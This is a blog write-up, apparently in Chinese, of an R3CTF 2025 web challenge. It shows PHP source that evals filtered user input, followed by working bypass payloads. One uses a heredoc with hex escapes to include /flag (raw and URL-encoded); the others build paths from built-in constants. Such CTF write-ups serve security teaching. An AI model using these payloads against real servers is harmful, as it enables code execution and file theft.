R3CTF-2025 web

OneZ3r0 Lv4
  2025-07-05 10:21:13 2025-07-05 10:21:13 创建   2026-03-01 11:33:36 2026-03-01 11:33:36 更新      

web1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
if (isset($_GET['input'])) {
    echo '<div class="output">';

    $filtered = str_replace(['$', '(', ')', '`', '"', "'", "+", ":", "/", "!", "?"], '', $_GET['input']);
    $cmd = $filtered . '();';

    echo '<strong>After Security Filtering:</strong> <span class="filtered">' . htmlspecialchars($cmd) . '</span>' . "\n\n";

    echo '<strong>Execution Result:</strong>' . "\n";
    echo '<div style="border-left: 3px solid #007bff; padding-left: 15px; margin-left: 10px;">';

    try {
        ob_start();
        eval($cmd);
        $result = ob_get_clean();

        if (!empty($result)) {
            echo '<span class="success">✅ Function executed successfully!</span>' . "\n";
            echo htmlspecialchars($result);
        } else {
            echo '<span class="success">✅ Function executed (no output)</span>';
        }
    } catch (Error $e) {
        echo '<span class="error">❌ Error: ' . htmlspecialchars($e->getMessage()) . '</span>';
    } catch (Exception $e) {
        echo '<span class="error">❌ Exception: ' . htmlspecialchars($e->getMessage()) . '</span>';
    }

    echo '</div>';
    echo '</div>';
}
?>

php heredoc文档 https://www.php.net/manual/en/language.types.string.php

支持不使用引号创建字符串,同时支持hex和oct

1
2
3
include <<<EOD
\x2fflag
EOD;getenv
1
%69%6e%63%6c%75%64%65%20%3c%3c%3c%45%4f%44%0a%5c%78%32%66%66%6c%61%67%0a%45%4f%44%3b%67%65%74%65%6e%76

当然还有用内置常量来绕过这种替换

[!Note]

注意这种内置常量和系统运行的环境有关

1
2
3
4
5
6
7
8
payload1:
@include DIRECTORY_SEPARATOR.flag;#

payload2:
include PHP_BINARY[0].f.PHP_BINARY[5].PHP_BINARY[8].g;#

pyload3:
include PHP_MANDIR[0].flag;#
  • 标题: R3CTF-2025 web
  • 作者: OneZ3r0
  • 创建于 : 2025-07-05 10:21:13
  • 更新于 : 2026-03-01 11:33:36
  • 链接: https://blog.onez3r0.top/2025/07/05/r3ctf-2025/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
目录
R3CTF-2025 web
  1. web1